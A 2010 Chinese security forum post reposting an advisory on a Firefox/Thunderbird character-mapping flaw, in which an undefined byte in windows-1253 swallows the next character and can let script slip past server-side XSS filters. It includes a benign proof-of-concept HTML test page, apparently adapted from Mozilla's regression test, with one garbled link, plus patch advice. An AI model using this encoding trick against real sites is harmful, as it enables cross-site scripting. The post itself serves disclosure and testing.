登录注册
下拉
注册
 社区应用最新帖子精华区社区服务会员列表统计排行银行
上一主题下一主题
主题 : Firefox字符映射错误显示漏洞+EXP
使用道具复制链接浏览器收藏打印
amxking在线
Information Security
级别: 管理员

UID: 3
精华: 47
发帖: 3034
安全币: 421443 枚
威望: 5773 点
贡献值: 5647 点
红科币: 285887 枚
好评度: 5763 点
在线时间: 2214(时)
注册时间: 2009-12-21
最后登录: 2010-09-09
楼主 发表于: 2010-07-30 09:43  
倒序阅读   只看楼主  

Firefox字符映射错误显示漏洞+EXP

发表:红科网安
发布:Amxking
受影响系统:
Mozilla Firefox 3.6.x
Mozilla Thunderbird 3.1.x
不受影响系统:
Mozilla Firefox 3.6.7
Mozilla Thunderbird 3.1.1
描述:
Firefox是一款流行的开源WEB浏览器。
一些8位编码包含有未定义的位置,映射到了U+FFFD。在显示的时候,可能不会显示紧随之后的字符。例如,windows-1253中的{'\xD1', '\xD2', '\xD3', 'xD4'}序列应为{U+3A1, U+FFFD, U+3A3, U+3A4}(也就是字符串Ρ�ΣΤ),但实际结果为{U+3A1, U+FFFD, U+3A4},缺少了U+3A3字符(也就是Ρ�Τ字符串,缺少Σ)。
在某些站点上这可能导致跨站脚本问题,因为服务器上过滤掉了某些应显示的字符。
<*来源:O. Andersen
 
  链接:http://secunia.com/advisories/39925/
        http://www.mozilla.org/security/announce/2010/mfsa2010-44.html
        https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=564679
        https://www.redhat.com/support/errata/RHSA-2010-0547.html
*>
测试方法:
 

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
 

复制代码
  1. <!DOCTYPE HTML>
  2. <html>
  3. <head>
  4. <meta http-equiv="Content-type" content="text/html; charset=windows-1253">
  5. <title>Test for Unicode non-characters</title>
  6. <script type="text/javascript" src="/MochiKit/packed.js"></script>
  7. <script type="text/javascript" src="/tests/SimpleTest/SimpleTest.js"></script>
  8. <link rel="stylesheet" type="text/css" href="/tests/SimpleTest/test.css" />
  9. <title>Firefox字符映射错误显示漏洞EXP-AKT专用版</title>
  10. </head>
  11. <body onload="test()">
  12. <pre id="test">
  13. <script class="testbody" type="text/javascript">
  14.  
  15. /** test that single byte decoding resynchronizes after incomplete sequences */
  16. function test()
  17. {
  18.     is($("display").innerHTML, "All good.", "No overconsumption");
  19.      SimpleTest.finish();
  20.  }
  21.  
  22.    SimpleTest.waitForExplicitFinish();
  23.  </script>
  24.  </pre>
  25.  <a target="_blank" href="Mozilla">http://bbs.honkwin.com/read-htm-tid-7237.html">about this Bug </a>
  26.  <p id="display">Evil.</p>
  27.  <div id="content" style="display: none"></div>
  28.   Ò<script type="text/javascript">
  29.   $("display").innerHTML = "All good.";
  30.    </script> ->
  31.  </body>
  32.  </html>

建议:
 
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载
http://www.mozilla.org/
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0547-01)以及相应补丁:
RHSA-2010:0547-01:Critical: firefox security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0547.html


关键词: 漏洞 红科网安 安全 script 攻击
In me the tiger sniffe the rose !浩瀚的宇宙中,我仅仅是一粒微尘!众人皆为吾师!
回复 引用
举报顶端
上一主题下一主题
 红科网安信息安全团队-〓A.K.T〓 » 最新漏洞{New Vulnerabilities}
描述
快速回复
如果您在写长篇帖子又不马上发表,建议存为草稿
验证问题:
我们的组织是? 正确答案:红科网安
按"Ctrl+Enter"直接提交
上一个下一个